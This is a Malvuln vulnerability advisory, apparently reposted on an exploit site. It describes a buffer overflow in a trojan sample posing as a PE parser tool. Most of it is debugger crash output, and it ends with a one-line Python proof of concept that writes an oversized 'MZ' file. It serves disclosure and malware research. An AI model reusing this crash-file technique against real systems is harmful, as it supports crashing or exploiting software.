Exploit for Trojan.Win32.Gofot.htx Buffer Overflow

## https://sploitus.com/exploit?id=PACKETSTORM:161558
Discovery / credits: Malvuln - malvuln.com (c) 2021  
Original source: https://malvuln.com/advisory/ae062bfe4abd59ac1b9be693fbc45f60.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln  
  
Threat: Trojan.Win32.Gofot.htx  
Vulnerability: Local File Buffer Overflow  
Description: HackerJLY PE Parser tool V1.0.1.8 doesnt properly check the files it loads which triggers a local buffer overflow. Analyzing the crash we can see an overwrite of the CX (16-bit) part of the ECX register with our 41414141 exploit pattern.  
Type: PE32  
MD5: ae062bfe4abd59ac1b9be693fbc45f60  
Vuln ID: MVID-2021-0110  
Dropped files:   
ASLR: True  
DEP: True  
Safe SEH: True  
Disclosure: 02/25/2021  
  
Memory Dump:  
0:000> dd cx  
00004141 ???????? ???????? ???????? ????????  
  
(1f60.100): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=45d84141 edx=0057e577 esi=00000003 edi=00000003  
eip=7710ed3c esp=0057d9c8 ebp=0057db58 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202  
ntdll!ZwWaitForMultipleObjects+0xc:  
7710ed3c c21400 ret 14h  
  
0:000> .ecxr  
eax=04970001 ebx=00000000 ecx=45d84141 edx=0057e577 esi=0057e3a0 edi=0057e570  
eip=00dca142 esp=0057e34c ebp=0057e34c iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246  
*** WARNING: Unable to verify checksum for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe  
*** ERROR: Module load completed but symbols could not be loaded for Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe  
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142:  
00dca142 813950450000 cmp dword ptr [ecx],4550h ds:002b:45d84141=????????  
0:000> !analyze -v  
*******************************************************************************  
* *  
* Exception Analysis *  
* *  
*******************************************************************************  
  
*** WARNING: Unable to verify checksum for SkinH.dll  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for SkinH.dll -   
  
FAULTING_IP:   
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142  
00dca142 813950450000 cmp dword ptr [ecx],4550h  
  
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)  
ExceptionAddress: 00dca142 (Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x0000a142)  
ExceptionCode: c0000005 (Access violation)  
ExceptionFlags: 00000000  
NumberParameters: 2  
Parameter[0]: 00000000  
Parameter[1]: 45d84141  
Attempt to read from address 45d84141  
  
DEFAULT_BUCKET_ID: INVALID_POINTER_READ  
  
PROCESS_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe  
  
OVERLAPPED_MODULE: Address regions for 'd3d10warp' and 'resourcepolicyclient.dll' overlap  
  
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.  
  
EXCEPTION_PARAMETER1: 00000000  
  
EXCEPTION_PARAMETER2: 45d84141  
  
READ_ADDRESS: 45d84141   
  
FOLLOWUP_IP:   
Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142  
00dca142 813950450000 cmp dword ptr [ecx],4550h  
  
MOD_LIST: <ANALYSIS/>  
  
NTGLOBALFLAG: 0  
  
APPLICATION_VERIFIER_FLAGS: 0  
  
FAULTING_THREAD: 00000100  
  
PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ  
  
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ  
  
LAST_CONTROL_TRANSFER: from 00dcab0f to 00dca142  
  
STACK_TEXT:   
WARNING: Stack unwind information not available. Following frames may be wrong.  
0057e34c 00dcab0f 0057e570 097c119a 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xa142  
0057e37c 00dd0af8 046acc58 0057e577 097c1746 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xab0f  
0057e5a0 00dd1d78 046acc58 097c1756 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10af8  
0057e928 00df676d 00f2fe28 0057f7f0 0057e968 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x11d78  
0057e938 00df697c 0057f7f0 000003e9 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3676d  
0057e968 00ecb1a4 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3697c  
0057e98c 00df3e09 000003e9 00000000 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x10b1a4  
0057e9dc 00df96fe 00000000 0080072c 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x33e09  
0057e9f0 00df4771 000003e9 0080072c 097c184e Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396fe  
0057eaa8 00defe3e 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x34771  
0057eac8 00df32bb 00000111 000003e9 0080072c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe3e  
0057eb3c 00df334a 0057f7f0 00d802be 00000111 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb  
0057eb5c 76eee0bb 00d802be 00000111 000003e9 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a  
0057eb88 76ef8849 00df3314 00d802be 00000111 user32!_InternalCallWinProc+0x2b  
0057ebac 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20  
0057ec7c 76ef833a 00df3314 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be  
0057ecc0 76edf38b 00000111 000003e9 0080072c user32!CallWindowProcAorW+0xd4  
0057ecd8 1002285c ffff04db 00d802be 00000111 user32!CallWindowProcA+0x1b  
0057ed34 76ef8849 1001f2d0 00d802be 00000111 SkinH+0x2285c  
0057ed58 76efb145 00000111 000003e9 0080072c user32!InternalCallWinProc+0x20  
0057ee28 76ee8503 1001f2d0 00000000 00000111 user32!UserCallWinProcCheckWow+0x1be  
0057ee90 76ee8aa0 03027740 00000000 00000111 user32!DispatchClientMessage+0x1b3  
0057eed8 77110bcd 0057eef4 00000020 0057f184 user32!__fnDWORD+0x50  
0057ef10 73ee2a4c 76efa9fd 00d802be 00000111 ntdll!KiUserCallbackDispatcher+0x4d  
0057ef14 76efa9fd 00d802be 00000111 000003e9 win32u!NtUserMessageCall+0xc  
0057ef80 76edb95b 03027740 00000000 0080072c user32!SendMessageWorker+0x860  
0057efa8 73836934 00d802be 00000111 000003e9 user32!SendMessageW+0x5b  
0057efc8 738368f9 007286c0 00000202 00000000 comctl32!Button_NotifyParent+0x39  
0057efe0 7384c14b 7384b890 0080072c 00000000 comctl32!Button_ReleaseCapture+0x9b  
0057f074 76eee0bb 0080072c 00000202 00000000 comctl32!Button_WndProc+0x8bb  
0057f0a0 76ef8849 7384b890 0080072c 00000202 user32!_InternalCallWinProc+0x2b  
0057f0c4 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20  
0057f194 76ef833a 7384b890 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be  
0057f1d8 76edfbab 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4  
0057f1f0 73a676f5 7384b890 0080072c 00000202 user32!CallWindowProcW+0x1b  
0057f214 00defcc9 7384b890 0080072c 00000202 apphelp!DWM8AND16BitHook_CallWindowProcW+0x35  
0057f234 00defe55 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fcc9  
0057f250 00df32bb 00000202 00000000 00150024 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2fe55  
0057f2c4 00df334a 0057f924 0080072c 00000202 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x332bb  
0057f2e4 76eee0bb 0080072c 00000202 00000000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3334a  
0057f310 76ef8849 00df3314 0080072c 00000202 user32!_InternalCallWinProc+0x2b  
0057f334 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20  
0057f404 76ef833a 00df3314 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be  
0057f44c 76edf38b 00000202 00000000 00150024 user32!CallWindowProcAorW+0xd4  
0057f464 10007514 ffff039b 0080072c 00000202 user32!CallWindowProcA+0x1b  
0057f4d8 76ef8849 10011fd0 0080072c 00000202 SkinH+0x7514  
0057f4fc 76efb145 00000202 00000000 00150024 user32!InternalCallWinProc+0x20  
0057f5cc 76ee90dc 10011fd0 00000000 00000202 user32!UserCallWinProcCheckWow+0x1be  
0057f638 76edb2ee 006f0588 00000000 00000100 user32!DispatchMessageWorker+0x4ac  
0057f66c 00e0a996 00d802be 006f0588 097c0426 user32!IsDialogMessageW+0x17e  
0057f6c0 00df5c7c 0057f7f0 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x4a996  
0057f6d4 00df0cb5 006f0588 0057f6f4 00dee82c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x35c7c  
0057f6e0 00dee82c 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x30cb5  
0057f6f4 00df96b9 006f0588 00d802be 0057f718 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2e82c  
0057f704 00df289a 006f0588 006f0588 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x396b9  
0057f718 00df7765 00d802be 006f0588 006f0558 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3289a  
0057f730 00df78bf 006f0588 0057f748 00df77b0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x37765  
0057f73c 00df77b0 006f0588 0057f780 00df790c Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x378bf  
0057f748 00df790c 006f0588 00000000 0057f7f0 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x377b0  
0057f780 00deeed5 00000004 097c052a 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x3790c  
0057f7cc 00dcf1f9 097c053e 00f61b48 00f61b48 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x2eed5  
0057fb44 00e20c1d 00fc7b10 00000000 00353000 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0xf1f9  
0057fb58 00dd59c4 00dc0000 00000000 006e1eb8 Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x60c1d  
0057fbe8 76198654 00353000 76198630 1507c2ff Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+0x159c4  
0057fbfc 77104a77 00353000 1fe72005 00000000 kernel32!BaseThreadInitThunk+0x24  
0057fc44 77104a47 ffffffff 77129ece 00000000 ntdll!__RtlUserThreadStart+0x2f  
0057fc54 00000000 00fc7b10 00353000 00000000 ntdll!_RtlUserThreadStart+0x1b  
  
  
SYMBOL_STACK_INDEX: 0  
  
SYMBOL_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142  
  
FOLLOWUP_NAME: MachineOwner  
  
MODULE_NAME: Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60  
  
IMAGE_NAME: Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe  
  
DEBUG_FLR_IMAGE_TIMESTAMP: 59b2a1cb  
  
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb  
  
FAILURE_BUCKET_ID: INVALID_POINTER_READ_c0000005_Trojan.Win32.Gofot.htx.ae062bfe4abd59ac1b9be693fbc45f60.exe!Unknown  
  
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_READ_Trojan_Win32_Gofot_htx_ae062bfe4abd59ac1b9be693fbc45f60+a142  
  
  
  
Exploit/PoC:  
python -c "print( 'MZ'+'A'*20000)" > pbarbar.exe  
  
  
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).